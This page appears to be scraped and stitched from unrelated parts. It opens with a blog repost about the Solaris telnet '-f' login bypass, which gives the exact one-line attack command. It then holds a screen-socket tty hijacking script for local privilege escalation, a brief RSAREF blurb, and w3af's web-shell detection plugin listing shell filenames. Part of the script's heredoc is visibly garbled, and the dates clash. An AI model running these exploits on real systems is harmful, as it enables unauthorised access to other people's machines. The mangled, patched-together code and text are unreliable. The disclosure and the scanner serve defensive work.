Monday, May 29, 2017

Trivial remote Solaris 0day, disable telnet now.

Oh jeez, that’s not good. This was posted to Full-Disclosure. Remote root exploit in the Solaris 10/11 telnet daemon. It doesn’t require any skill, any exploit knowledge, and can be scripted for mass attacks. Basically if you pass a “-fusername” as an argument to the –l option you get full access to the OS as the user specified. In my example I do it as bin but it worked for regular users, just not for root. This combined with a reliable local privilege escalation exploit would be devastating. Expect mass scanning and possibly the widespread exploitation of this vulnerability.

And example of the command line is

telnet -l "-fbin" target_address

Please disable telnet on Solaris at this time. The HEV for this will be shipping to ErrataSec customers within the hour.



UPDATE: There seems to be some conflicting reports about this vulnerability working with the root account. This does not work on a default install of Solaris 10. By default a variable is set in /etc/default/login called CONSOLE. If this variable is set then root is not allowed to login from anywhere but the console. Commenting this variable out allows root to login from anywhere and allows this vulnerability to take advantage of the telnet exploit. Below is a pic of my trying it with console set then with console commented out.


http://blog.erratasec.com/2007/02/trivial-remote-solaris-0day-disable.html#.WSxAPOvyuds

NetworkBlockDevice/nbd code bug

DoD

**DO NOT DISTRIBUTE**
#

SCREEN=/usr/bin/screen
umask 0

if [ ! -x $SCREEN ]; then
  echo "I can't execute $SCREEN..."
  exit 0
fi

LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa

if [ -f "$LINK" ]; then
  echo "DAMN. I don't have usable pts socket available..."
  exit 0
fi

echo -ne "Finding root owned tty...\t\t"
unset TTY

for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
  if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
     TTY="$x"
     break
  fi
done

echo -n "$TTY"

if [ "$TTY" = "" ]; then
  echo -e "\nI can't find a root owned tty!"
  exit 0
fi

if [ ! -w $HOME -o ! -w /tmp ]; then
  echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
  exit 0
fi

cat >$HOME/.screenrc <<_eof_ -aa="" -c="" -d="" -m="" -ne="" -q="" -s="" 00="" 100="" _eof_="" amp="" autodetach="" defscrollback="" defsocketpath="" echo="" hs:ts="\E_:fs=\E\\:ds=\E_\E\\" nstarting="" on="" screen...="" screenrc="" t="" termcapinfo="" vbell="">/dev/null &
SCPID=`echo $!`

echo -n "PID: $SCPID"

while :; do
  sleep 1
  if [ "$#" -ge "0" ]; then
    break
  fi
done

cd /tmp
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"

CNT=5   # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
  let CNT=$CNT-1
  sleep 1
done
echo -n "Done."

echo -ne "\nLinking to root owned terminal...\t\t"
ln -fs $TTY $LINK &>/dev/null

echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."

$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null

echo -ne "\rComplete.\n"

exit 1
[END_CUT] screen.sh


RSAREF is a cryptographic toolkit designed to facilitate rapid deployment of Internet Privacy-Enhanced Mail (PEM) implementations. RSAREF represents the fruits of RSA Data Security's commitment to the U.S. Department of Defense's Advanced Research Projects Agency (DARPA) to provide free cryptographic source code in support of a PEM standard. RSA Laboratories offers RSAREF in expectation of PEM's forthcoming publication as an Internet standard.

findBackdoor.py

class findBackdoor(baseDiscoveryPlugin):
00124     '''
00125     Find web backdoors and web shells.
00126     @author: Andres Riancho ( andres.riancho@gmail.com )
00127     '''
00128 
00129     def __init__(self):
00130         baseDiscoveryPlugin.__init__(self)
00131         
00132         # Internal variables
00133         self._analyzed_dirs = disk_list()
00134         self._fuzzable_requests_to_return = []
00135 
00136     def discover(self, fuzzableRequest):
00137         '''
00138         For every directory, fetch a list of shell files and analyze the response.
00139         
00140         @parameter fuzzableRequest: A fuzzableRequest instance that contains 
00141         (among other things) the URL to test.
00142         '''
00143         domain_path = fuzzableRequest.getURL().getDomainPath()
00144         self._fuzzable_requests_to_return = []
00145 
00146         if domain_path not in self._analyzed_dirs:
00147             self._analyzed_dirs.append(domain_path)
00148 
00149             # Search for the web shells
00150             for web_shell_filename in WEB_SHELLS:
00151                 web_shell_url = domain_path.urlJoin(web_shell_filename)
00152                 # Perform the check in different threads
00153                 targs = (web_shell_url,)
00154                 self._tm.startFunction(target=self._check_if_exists, 
00155                                        args=targs, ownerObj=self)
00156 
00157             # Wait for all threads to finish
00158             self._tm.join(self)
00159 
00160             return self._fuzzable_requests_to_return
00161 
00162     
00163     def _check_if_exists(self, web_shell_url):
00164         '''
00165         Check if the file exists.
00166         
00167         @parameter web_shell_url: The URL to check
00168         '''
00169         try:
00170             response = self._urlOpener.GET(web_shell_url, useCache=True)
00171         except w3afException:
00172             om.out.debug('Failed to GET webshell:' + web_shell_url)
00173         else:
00174             if self._is_possible_backdoor(response):
00175                 v = vuln.vuln()
00176                 v.setPluginName(self.getName())
00177                 v.setId(response.id)
00178                 v.setName('Possible web backdoor')
00179                 v.setSeverity(severity.HIGH)
00180                 v.setURL(response.getURL())
00181                 msg = 'A web backdoor was found at: "%s"; this could ' \
00182                 'indicate that the server was hacked.' % v.getURL()
00183                 v.setDesc(msg)
00184                 kb.kb.append(self, 'backdoors', v)
00185                 om.out.vulnerability(v.getDesc(), severity=v.getSeverity())
00186 
00187                 fuzzable_requests = self._createFuzzableRequests(response)
00188                 self._fuzzable_requests_to_return += fuzzable_requests
00189             
00190     def _is_possible_backdoor(self, response):
00191         '''
00192         Heuristic to infer if the content of  has the pattern of a
00193         backdoor response.
00194         
00195         @param response: httpResponse object
00196         @return: A bool value
00197         '''
00198         if not is_404(response):
00199             body_text = response.getBody()
00200             dom  = response.getDOM()
00201             if dom:
00202                 for ele, attrs in BACKDOOR_COLLECTION.iteritems():
00203                     for attrname, attr_vals in attrs.iteritems():
00204                         # Set of lowered attribute values
00205                         dom_attr_vals = \
00206                             set(n.get(attrname).lower() for n in \
00207                                 (dom.xpath('//%s[@%s]' % (ele, attrname))))
00208                         # If at least one elem in intersection return True
00209                         if (dom_attr_vals and set(attr_vals)):
00210                             return True
00211     
00212             # If no regex matched then try with keywords. At least 2 should be
00213             # contained in 'body_text' to succeed.
00214             times = 0
00215             for back_kw in KNOWN_OFFENSIVE_WORDS:
00216                 if re.search(back_kw, body_text, re.I):
00217                     times += 1
00218                     if times == 2:
00219                         return True
00220         return False
00221 
00222     def getOptions(self):
00223         '''
00224         @return: A list of option objects for this plugin.
00225         '''
00226         ol = optionList()
00227         return ol
00228 
00229     def setOptions(self, OptionList):
00230         '''
00231         This method sets all the options that are configured using the user interface 
00232         generated by the framework using the result of getOptions().
00233         
00234         @parameter OptionList: A dictionary with the options for the plugin.
00235         @return: No value is returned.
00236         '''
00237         pass
00238 
00239     def getPluginDeps(self):
00240         '''
00241         @return: A list with the names of the plugins that should be runned before the
00242         current one.
00243         '''
00244         return []
00245 
00246     def getLongDesc(self):
00247         '''
00248         @return: A DETAILED description of the plugin functions and features.
00249         '''
00250         return '''
00251         This plugin searches for web shells in the directories that are sent as input.
00252         For example, if the input is:
00253             - http://host.tld/w3af/f00b4r.php
00254             
00255         The plugin will perform these requests:
00256             - http://host.tld/w3af/c99.php
00257             - http://host.tld/w3af/cmd.php
00258             - http://host.tld/w3af/webshell.php
00259             ...
00260         '''
https://sourcecodebrowser.com/w3af/1.0.0/find_backdoor_8py_source.html